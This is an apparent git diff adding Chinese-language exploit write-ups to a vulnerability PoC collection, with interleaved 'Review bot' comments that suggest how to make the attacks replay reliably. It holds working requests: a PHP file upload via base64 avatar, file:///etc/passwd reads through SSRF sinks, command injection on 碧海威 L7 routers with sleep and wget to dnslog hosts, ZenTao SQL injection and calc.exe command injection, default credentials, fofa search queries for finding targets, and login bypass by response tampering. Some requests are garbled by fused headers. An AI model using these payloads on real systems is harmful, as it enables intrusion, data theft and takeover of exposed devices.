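Review bot: `tid=(CASE WHEN (3711=3711) THEN SLEEP(5) ELSE 3711 END)` is an always-true branch, so a slow target is indistinguishable from a vulnerable one; pair it with the false branch (for example `3711=3712`) and state the expected difference in response time. The parentheses, spaces and `=` inside the value should also be URL-encoded in a form body.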
@@ -0,0 +1,36 @@ +# 短剧影视小程序前台base64_image_content任意文件上传漏洞 + +**注意 这里需要登录,普通用户权限即可 访问 /index/user 可直接注册登录。** + +## fofa + +```yaml +"/VwmRIfEYDH.php" +``` + +## poc + +```javascript +POST /api/user/avatar HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0 +Connection: keep-alive +Content-Length: 73Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=qt0rrvopobbbvibu6f8p9lr42 +rHost: 127.0.0.1 +Origin: http://127.0.0.1 +Referer: http://127.0.0.1/api/user/avatar +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 + +base64=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg== +``` + +![image-20240902102758828](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021027916.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/3WYJzQnjl8hP7oXVZUEQuA \ No newline at end of file diff --git a/短剧影视小程序前台juhecurl任意文件读取漏洞.md b/短剧影视小程序前台juhecurl任意文件读取漏洞.md new file mode 100644 index 0000000..67af33a --- /dev/null +++ b/短剧影视小程序前台juhecurl任意文件读取漏洞.md 
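Review bot: several headers in the avatar request are fused or split (`Accept-Language: ...;q=0.7Cache-Control: max-age=0`, `Content-Length: 73Content-Type: application/x-www-form-urlencoded`, and `Cookie: PHPSESSID=qt0rrvopobbbvibu6f8p9lr42` followed by `rHost: 127.0.0.1`, where the trailing `r` of the session id has moved onto the Host line), so the request will not replay as written. `base64=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==` decodes to `a<?php phpinfo();?>`, but the page never shows where the file lands or how the response reveals its path, and the title's `base64_image_content` is not the `/api/user/avatar` route used; name the function-to-route relationship.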
@@ -0,0 +1,33 @@ +# 短剧影视小程序前台juhecurl任意文件读取漏洞 + + + +## fofa + +```yaml +"/VwmRIfEYDH.php" +``` + +## poc + +```javascript +GET /api/ems/juhecurl?url=file:///etc/passwd HTTP/1.1 +Host: 127.0.0.1 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20240902102433044](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021024146.png) + +![image-20240902102440030](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021024087.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/3WYJzQnjl8hP7oXVZUEQuA \ No newline at end of file diff --git a/短剧影视小程序前台未授权漏洞.md b/短剧影视小程序前台未授权漏洞.md new file mode 100644 index 0000000..99fead5 --- /dev/null +++ b/短剧影视小程序前台未授权漏洞.md @@ -0,0 +1,26 @@ +# 短剧影视小程序前台未授权漏洞 + +**在 /api/controller/Index.php 控制器的index方法中,很明显地存在 where 查询网站信息及User表中的字段,并且将所有用户枚举出来,且因为 $noNeedLogin = ['*'] 导致所有接口都无权限验证.** + +## fofa + +```yaml +"/VwmRIfEYDH.php" +``` + +## poc + +```javascript +POST /api/index HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 + +``` + +![image-20240902103321159](C:/Users/26927/AppData/Roaming/Typora/typora-user-images/image-20240902103321159.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/3WYJzQnjl8hP7oXVZUEQuA \ No newline at end of file diff --git a/短视频系统视频知识付费系统存在任意文件读取漏洞.md b/短视频系统视频知识付费系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..c6e04c4 --- /dev/null +++ b/短视频系统视频知识付费系统存在任意文件读取漏洞.md 
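Review bot: `/api/ems/juhecurl?url=file:///etc/passwd` is a caller-chosen `url=` sink that accepts `file://`, i.e. an SSRF that also reads files; the title undersells it and readers should be told to test internal `http://` targets as well. In the 未授权 page of this hunk the screenshot points at a local path (`C:/Users/26927/AppData/Roaming/Typora/...`) that will never render in the repo; replace it with a hosted image or drop it, and the `POST /api/index` request has no body or Content-Length, so confirm a bare POST is what enumerates users.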
@@ -0,0 +1,32 @@ +# 短视频系统视频知识付费系统存在任意文件读取漏洞 + +# 一、漏洞简介 +短视频系统视频知识付费系统是FastAdmin框架短视频系统/视频知识付费源码/附带小说系统,系统视频支持包月、单独购买、观影卷等功能。短视频系统视频知识付费系统存在任意文件读取漏洞 + +# 二、影响版本 ++ 短视频系统视频知识付费系统 + +# 三、资产测绘 ++ fofa`"testvideo://login?id="` ++ 特征 + +![1732590500428-b97fa7a7-1614-41b1-bbe8-c54cb6182208.png](./img/1DDZ9fZyRHdnns0P/1732590500428-b97fa7a7-1614-41b1-bbe8-c54cb6182208-475278.png) + +# 四、漏洞复现 +```plain +GET /index/index/request_by_curl?remote_server=file:///etc/passwd&post_string=1 HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![1732590542557-0279172f-b4e1-423f-9093-909316a7e452.png](./img/1DDZ9fZyRHdnns0P/1732590542557-0279172f-b4e1-423f-9093-909316a7e452-044964.png) + + + +> 更新: 2024-11-27 10:00:05 +> 原文: \ No newline at end of file diff --git a/碧海威L7多款产品confirm存在命令执行漏洞.md b/碧海威L7多款产品confirm存在命令执行漏洞.md new file mode 100644 index 0000000..27ac550 --- /dev/null +++ b/碧海威L7多款产品confirm存在命令执行漏洞.md 
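Review bot: `request_by_curl?remote_server=file:///etc/passwd&post_string=1` is a server-side curl with a caller-chosen URL (forced to POST by `post_string`), so this is an SSRF primitive, not only a file read; classify it that way and state whether the fetched body is echoed back in the response, since that decides whether internal targets can be read or only reached blind.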
@@ -0,0 +1,58 @@ +# 碧海威 L7多款产品confirm存在命令执行漏洞 + +# 一、漏洞简介 +碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品confirm存在命令执行漏洞 + +# 二、影响版本 ++ 碧海威 L7云路由 + +# 三、资产测绘 +```plain +product="碧海威科技-L7云路由" +``` + +![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/mHd0RhkHaJqo_UPI/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-319239.png) + +# 四、漏洞复现 +```plain +GET /notice/confirm.php?t=;sleep%203 HTTP/1.1 +Host: +Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1717873640214-f81c5977-3acf-4091-84f5-157642413565.png](./img/mHd0RhkHaJqo_UPI/1717873640214-f81c5977-3acf-4091-84f5-157642413565-272740.png) + +```plain +GET /notice/jumper.php?t=;wget%20tadayzkvfq.dgrh3.cn HTTP/1.1 +Host: +Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1719303279808-613fbf12-e772-469f-9dfb-1bf1c3d53d44.png](./img/mHd0RhkHaJqo_UPI/1719303279808-613fbf12-e772-469f-9dfb-1bf1c3d53d44-161786.png) + + + +> 更新: 2024-06-27 09:15:18 +> 原文: \ No newline at end of file 
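Review bot: the second request in the confirm.php page targets `/notice/jumper.php?t=;wget%20tadayzkvfq.dgrh3.cn`, which belongs in the separate jumper page of this series, not here. Both requests embed a concrete dnslog domain (`tadayzkvfq.dgrh3.cn`) and a `SESSID` cookie; replace the domain with a placeholder and state whether the cookie is required, i.e. whether `/notice/confirm.php?t=;sleep%203` works pre-authentication.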
diff --git a/碧海威L7多款产品index存在命令执行漏洞.md b/碧海威L7多款产品index存在命令执行漏洞.md new file mode 100644 index 0000000..7a4610a --- /dev/null +++ b/碧海威L7多款产品index存在命令执行漏洞.md @@ -0,0 +1,31 @@ +# 碧海威 L7多款产品index存在命令执行漏洞 + +# 一、漏洞简介 +碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品index存在命令执行漏洞 + +# 二、影响版本 ++ 碧海威 L7云路由 + +# 三、资产测绘 +```plain +product="碧海威科技-L7云路由" +``` + +![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/5VV9Gb23QQkaNIBN/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-055453.png) + +# 四、漏洞复现 +```plain +POST /portal/ibilling/index.php HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 + +{"type":5,"version":2,"bypass":";wget sadvlgapra.dgrh3.cn"} +``` + +![1717873439881-6561c715-975f-49c4-a47f-5a787180f384.png](./img/5VV9Gb23QQkaNIBN/1717873439881-6561c715-975f-49c4-a47f-5a787180f384-400658.png) + + + +> 更新: 2024-06-27 09:15:18 +> 原文: \ No newline at end of file diff --git a/碧海威L7多款产品jumper存在命令执行漏洞.md b/碧海威L7多款产品jumper存在命令执行漏洞.md new file mode 100644 index 0000000..4416e6c --- /dev/null +++ b/碧海威L7多款产品jumper存在命令执行漏洞.md 
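Review bot: `Content-Type: application/x-www-form-urlencoded` with the JSON body `{"type":5,"version":2,"bypass":";wget sadvlgapra.dgrh3.cn"}` is inconsistent; if `/portal/ibilling/index.php` parses the raw body as JSON say so, otherwise set `application/json`. An OOB-only payload (wget to a dnslog host) gives no in-band confirmation; add the `;sleep 3` timing variant used on the confirm/jumper pages and replace the hard-coded dnslog host with a placeholder.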
@@ -0,0 +1,39 @@ +# 碧海威 L7多款产品jumper存在命令执行漏洞 + +# 一、漏洞简介 +碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品jumper存在命令执行漏洞 + +# 二、影响版本 ++ 碧海威 L7云路由 + +# 三、资产测绘 +```plain +product="碧海威科技-L7云路由" +``` + +![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/vNePAYlOhVA2Jyhf/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-444380.png) + +# 四、漏洞复现 +```plain +GET /notice/jumper.php?t=;sleep%203 HTTP/1.1 +Host: +Cookie: SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1717873704369-554c7e1b-fc19-438c-b0c1-8c9cff46c2a7.png](./img/vNePAYlOhVA2Jyhf/1717873704369-554c7e1b-fc19-438c-b0c1-8c9cff46c2a7-473227.png) + + + +> 更新: 2024-06-27 09:15:18 +> 原文: \ No newline at end of file diff --git a/碧海威L7多款产品存在后台命令执行漏洞.md b/碧海威L7多款产品存在后台命令执行漏洞.md new file mode 100644 index 0000000..4704ba0 --- /dev/null +++ b/碧海威L7多款产品存在后台命令执行漏洞.md 
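Review bot: the jumper.php PoC is the same `t=;sleep%203` timing probe as the confirm.php page and ships with the same `SESSID=e2cc8cfb14aa1d77ffcfc93204a1d57b` cookie; state whether the cookie is needed (pre- or post-auth) and give the baseline-versus-sleep timings to compare, since a bare 3 s delay is weak evidence on its own.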
@@ -0,0 +1,35 @@ +# 碧海威 L7多款产品存在后台命令执行漏洞 + +# 一、漏洞简介 +碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品存在后台命令执行漏洞 + +# 二、影响版本 ++ 碧海威 L7云路由 + +# 三、资产测绘 +```plain +product="碧海威科技-L7云路由" +``` + +![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/vvU9uRd8v176utG_/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-971649.png) + +# 四、漏洞复现 +使用弱口令登录后台 + +```plain +admin/admin +admin/admin123 +``` + +![1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a.png](./img/vvU9uRd8v176utG_/1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a-997411.png) + +```plain +help & cat /etc/passwd +``` + +![1717873247660-03aaa28f-7534-404a-9426-de729a732f3e.png](./img/vvU9uRd8v176utG_/1717873247660-03aaa28f-7534-404a-9426-de729a732f3e-517323.png) + + + +> 更新: 2024-06-27 09:15:18 +> 原文: \ No newline at end of file diff --git a/碧海威L7多款产品存在弱口令漏洞.md b/碧海威L7多款产品存在弱口令漏洞.md new file mode 100644 index 0000000..fee6c84 --- /dev/null +++ b/碧海威L7多款产品存在弱口令漏洞.md @@ -0,0 +1,27 @@ +# 碧海威 L7多款产品存在弱口令漏洞 + +# 一、漏洞简介 +碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品存在弱口令漏洞 + +# 二、影响版本 ++ 碧海威 L7云路由 + +# 三、资产测绘 +```plain +product="碧海威科技-L7云路由" +``` + +![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/oQO3NqHUdc5J7H6A/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-933959.png) + +# 四、漏洞复现 +```plain +admin/admin +admin/admin123 +``` + +![1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a.png](./img/oQO3NqHUdc5J7H6A/1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a-014169.png) + + + +> 更新: 2024-06-27 09:15:18 +> 原文: \ No newline at end of file diff --git a/神州数码DCN系统接口online_list.php存在任意文件读取漏洞.md b/神州数码DCN系统接口online_list.php存在任意文件读取漏洞.md new file mode 100644 index 0000000..8d72dd4 --- /dev/null +++ b/神州数码DCN系统接口online_list.php存在任意文件读取漏洞.md 
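Review bot: the 后台命令执行 page shows the injected string `help & cat /etc/passwd` but never names the page, form or parameter it is typed into after logging in with `admin/admin`; add the request (URL and parameter) so the finding can be reproduced without the screenshot. The 弱口令 page in the same hunk repeats the identical credential list; cross-reference it instead of duplicating.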
@@ -0,0 +1,21 @@ +# 神州数码DCN系统接口online_list.php存在任意文件读取漏洞 + +神州数码DCN系统接口online_list.php存在任意文件读取漏洞 + +## fofa + +```javascript +body="style/blue/css/dcn_ui.css" +``` + +## poc + +```javascript +POST /function/auth/user/online_list.php HTTP/1.1 +Host: {{Hostname}} +Content-Type: application/x-www-form-urlencoded + +proxy_request=/etc/passwd +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412181058717.webp) \ No newline at end of file diff --git a/禅道-16.5-router.class.php-SQL注入漏洞.md b/禅道-16.5-router.class.php-SQL注入漏洞.md new file mode 100644 index 0000000..738edf6 --- /dev/null +++ b/禅道-16.5-router.class.php-SQL注入漏洞.md @@ -0,0 +1,5 @@ +## 禅道 16.5 router.class.php SQL注入漏洞 +``` +POST /user-login.html +account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23 +``` diff --git a/禅道-v18.0-v18.3-存在后台命令执行漏洞.md b/禅道-v18.0-v18.3-存在后台命令执行漏洞.md new file mode 100644 index 0000000..88205e0 --- /dev/null +++ b/禅道-v18.0-v18.3-存在后台命令执行漏洞.md 
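Review bot: the 禅道 16.5 one-liner `POST /user-login.html` with `account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23` lacks `Host` and `Content-Type: application/x-www-form-urlencoded`, and it overlaps with 禅道16.5accountSQL注入漏洞.md later in this series, which describes the same router.class.php bug but does not show this payload; merge them so the error-based payload sits with the full write-up. For the DCN page, `proxy_request=/etc/passwd` reads an absolute path; say whether relative traversal also works.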
@@ -0,0 +1,35 @@ +## 禅道 v18.0-v18.3 存在后台命令执行漏洞 + +禅道后台存在 RCE 漏洞,存在于 V18.0-18.3 之间,经过复现分析,发现漏洞来源于新增加的一个功能模块。 + +## fofa + +``` +app="易软天创-禅道系统" +``` + +## poc + +``` +POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:109.0)Gecko/20100101 Firefox/111.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Referer: http://xxx.xxx.xxx.xxx/zentaopms/www/index.php?m=zahost&f=create +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 134 +Origin: http://xxx.xxx.xxx.xxx +Connection: close +Cookie: zentaosid=fwaf16g51w678678qw686; +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +vsoft=kvm&hostType=physical&name=penson&extranet=xxx.xxx.xxx.xxx%7Ccalc.exe&cpuCores= +2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=z +``` + +![image-20240615214003637](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406152140793.png) diff --git a/禅道16.5accountSQL注入漏洞.md b/禅道16.5accountSQL注入漏洞.md new file mode 100644 index 0000000..59c227b --- /dev/null +++ b/禅道16.5accountSQL注入漏洞.md 
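Review bot: the form body is split across two lines (`...&cpuCores=` and `2&memory=16&diskSize=16&...`), so as written the request ends at the newline and `Content-Length: 134` no longer matches; join it into one line. `extranet=xxx.xxx.xxx.xxx%7Ccalc.exe` only demonstrates Windows; add a Linux variant or note the platform, and the `/zentaopms/www/` prefix is deployment-specific and should be called out as such.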
@@ -0,0 +1,39 @@ +# 禅道 16.5 account SQL注入漏洞 + +# 一、漏洞简介 +禅道由青岛易软天创网络科技有限公司开发,国产开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整覆盖了研发项目管理的核心流程。禅道 16.5 router.class.php 文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息,危害服务器安全。 + +# 二、影响版本 ++ 禅道16.5 + +# 三、资产测绘 ++ hunter`app.name="ZenTao 禅道"` ++ 特征 + +![1699714478551-516f3fa2-9e4b-4d88-9b29-fa34268af56c.png](./img/a7H1Slhd-hEcTkS9/1699714478551-516f3fa2-9e4b-4d88-9b29-fa34268af56c-608814.png) + +# 四、漏洞复现 +```plain +POST /zentao/user-login.html HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 137 +Connection: close +Cookie: zentaosid=83503a42384249100e644a077c476c0c; lang=zh-cn; device=desktop; theme=default; windowWidth=1512; windowHeight=763 + +account=admin&password=91366fe23f8bf94e543b036e8fbcbc9c +``` + +sqlmap + +![1699714542899-4cb34bcb-cf2f-44a1-8647-959493ec72b4.png](./img/a7H1Slhd-hEcTkS9/1699714542899-4cb34bcb-cf2f-44a1-8647-959493ec72b4-906892.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/禅道20.7后台任意文件读取漏洞.md b/禅道20.7后台任意文件读取漏洞.md new file mode 100644 index 0000000..dd60071 --- /dev/null +++ b/禅道20.7后台任意文件读取漏洞.md @@ -0,0 +1,17 @@ +# 禅道20.7后台任意文件读取漏洞 + +禅道20.7后台任意文件读取漏洞,只能读取网站目录下的文件 + +## fofa + +```javascript +app="易软天创-禅道系统" +``` + +## poc + +```javascript +http://192.168.91.1:8017/index.php?m=editor&f=edit&filePath=Li4vLi4vY29uZmlnL215LnBocA==&action=extendOther&isExtends=3 +``` + +![image-20241028155218530](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410281552692.png) \ No newline at end of file diff --git a/禅道21.1开源版存在SQL注入漏洞.md b/禅道21.1开源版存在SQL注入漏洞.md new file mode 100644 index 0000000..6a4a6e7 
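Review bot: the 16.5 account PoC body `account=admin&password=91366fe23f8bf94e543b036e8fbcbc9c` contains no injection at all; it is a plain login and the only evidence is a sqlmap screenshot. Add the actual payload (the `extractvalue(...)` form from 禅道-16.5-router.class.php-SQL注入漏洞.md) and the sqlmap command with `-p account`. In the 20.7 page, say that `filePath=Li4vLi4vY29uZmlnL215LnBocA==` is base64 for `../../config/my.php` so readers can target other files under the web root, and that the `editor` module needs an admin session (the title already says 后台).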
--- /dev/null +++ b/禅道21.1开源版存在SQL注入漏洞.md @@ -0,0 +1,38 @@ +# 禅道21.1开源版存在SQL注入漏洞 + +禅道21.1 module\search\ control.php 在 againstCond 的拼接过程中,每个单词被直接添加到查询条件中,没有进行任何过滤或转义处理。如果 $word 是单引号('),它会被包含在 + 运算符和双引号内,导致生成的 SQL 查询语句不正确。likeCondition 直接将 $keywords 插入到 SQL 查询中,没有进行任何过滤或转义处理。如果 $keywords 包含特殊字符(如单引号等),会导致生成的 SQL 查询语句不正确,从而产生 SQL 注入漏洞。 + +## fofa + +```javascript +app="易软天创-禅道系统" +``` + +## poc + +```javascript +GET /index.php?m=search&f=index&words=1&type=all&zin=1 HTTP/1.1 +Host: 192.168.88.6 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: / +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Referer: http://192.168.88.6/ +X-ZIN-Options: {"selector":["#configJS","title>","body>*"],"type":"list"} +X-ZIN-App: search +X-Zin-Cache-Time: 0 +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Cookie: zentaosid=d5ikdmm295l1ca5ec4an8p4f7u; lang=zh-cn; vision=rnd; device=desktop; theme=default; keepLogin=on; za=admin; zp=abd630d8e942046184fb94d4e591e66cd011665a; hideMenu=false; tab=search +Priority: u=4 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501131036576.png) + +python sqlmap.py -r 1.txt --level=5 --risk=3 --threads=10 --dbms=mysql + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501131037779.png) + +## 漏洞来源 + +- https://xz.aliyun.com/t/16976 \ No newline at end of file diff --git a/禅道开源项目管理软件信息收集.md b/禅道开源项目管理软件信息收集.md new file mode 100644 index 0000000..cb2042d --- /dev/null +++ b/禅道开源项目管理软件信息收集.md 
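Review bot: `words=1` in the search request carries no payload and the Accept header has lost its value (`Accept: /`, presumably `*/*` eaten by markdown); mark the injection point (`words=1'` or sqlmap's `*`) and run sqlmap with `-p words` rather than `--level=5 --risk=3` across every parameter and cookie. The cookie line includes `keepLogin=on; za=admin; zp=abd630d8e942046184fb94d4e591e66cd011665a`, which are ZenTao keep-login credentials; state that the search module requires an authenticated session and redact the token.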
@@ -0,0 +1,23 @@ +# 禅道开源项目管理软件信息收集 + +# 1. 简介 +禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。 + +禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的 API 可以调用。 + +# 2. 信息收集 +1. **查看禅道版本信息** + +`/zentao/index.php?mode=getconfig` + +![1677052214444-d0ebf239-9fbf-4af0-b959-450f2ddadd6b.png](./img/g9ITGzx8_7tv859W/1677052214444-d0ebf239-9fbf-4af0-b959-450f2ddadd6b-400325.png) + +2. **默认密码admin/123456** +3. **绝对路径** + +`/zentao/sss`![1677053746338-7b9bbe00-9613-42b4-8e3a-a8fad424a87f.png](./img/g9ITGzx8_7tv859W/1677053746338-7b9bbe00-9613-42b4-8e3a-a8fad424a87f-217839.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/私有云管理平台存在登录绕过漏洞.md b/私有云管理平台存在登录绕过漏洞.md new file mode 100644 index 0000000..f77f419 --- /dev/null +++ b/私有云管理平台存在登录绕过漏洞.md @@ -0,0 +1,21 @@ +# 私有云管理平台存在登录绕过漏洞 + +私有云管理平台存在登录绕过漏洞 + +## hunter + +```yaml +web.title="私有云管理后台" +``` + +## poc + +登陆界面抓包改返回响应的数据 + +```java +{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="} +``` + +![image-20240821093116155](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408210931202.png) + +![image-20240821092633292](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408210926351.png) \ No newline at end of file diff --git a/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md b/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md new file mode 100644 index 0000000..d03786a --- /dev/null +++ b/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md 
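Review bot: the 私有云 bypass is shown by rewriting the login response to `{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="}`; a forged response only fools the front-end unless the server also accepts whatever session the client then presents, so the page needs to name the login endpoint, say whether `msg` is a fixed token, and show a follow-up authenticated API call succeeding. In the 禅道 information-gathering page, `/zentao/sss` is a non-existent path whose error page discloses the absolute path; say that explicitly, and note that `admin/123456` is the installer default.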
